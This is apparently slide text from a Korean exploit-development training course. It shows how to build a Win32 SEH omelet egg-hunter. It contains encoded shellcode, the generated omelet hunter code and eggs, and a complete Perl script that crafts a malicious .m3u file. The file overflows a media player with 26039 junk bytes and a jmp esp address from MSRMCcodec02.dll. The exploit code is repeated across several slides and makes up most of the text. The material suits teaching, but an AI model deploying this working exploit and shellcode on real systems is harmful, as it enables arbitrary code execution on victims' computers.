Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

오믈렛 코드 패키지 다운로드(쉘코드 단편화 및 오믈렛 코드 생성 스크립트)

W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

쉘코드 파일 생성 (makingShellCodeForOmelet.pl)my $scfile="shellcode.bin"; my $shellcode="\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" . "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" . "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" . "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" . "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" . "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" . "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" . "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" . "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" . "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" . "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" . "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" . "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" . "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" . "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" . "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" . "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" . "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

open(FILE,">$scfile"); print FILE $shellcode; close(FILE); print "Wrote ".length($shellcode)." bytes to file ".$scfile."\n";

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

쉘코드를 에그로 변환

하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.pySyntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]

Where: omelet bin file = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code. shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code. output txt file = The file you want the omelet egg-hunt code and the eggs to be written to (in text format). egg size = The size of each egg (legal values: 6-127, default: 127) marker bytes = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876)

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55

Convert the shell code to eggs

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

쉘코드를 에그로 변환

하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55

// This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes:omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";

// These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode// (you can insert them as many times as you want, as long as each one is// inserted at least once). They are 127 bytes each:egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

쉘코드를 에그로 변환

하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55

// This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes:omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";

// These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode// (you can insert them as many times as you want, as long as each one is// inserted at least once). They are 127 bytes each:egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

omelet_code

egg0

egg1

egg2

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

my $file= "OmeletEggHuntingExploit1.m3u";

my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll

my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;

my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";

my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";

my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

open($FILE,">$file"); print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3; close($FILE); print "m3u File Created successfully\n";

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

접근 위반 발생 (Access violation when reading [00000000]

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";

my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll

my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;

my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";

my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";

my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

jump to shell code

omit…

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";

my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll

my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;

my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";

my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";

my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

omit… omelet code for finding eggs

for nop sled

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";

my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll

my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;

my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";

my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";

my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

omit… omelet code for finding eggs

for nop sled

EDI → 0x00000000

start: XOR EDI, EDI jmp SHORT reset_stack

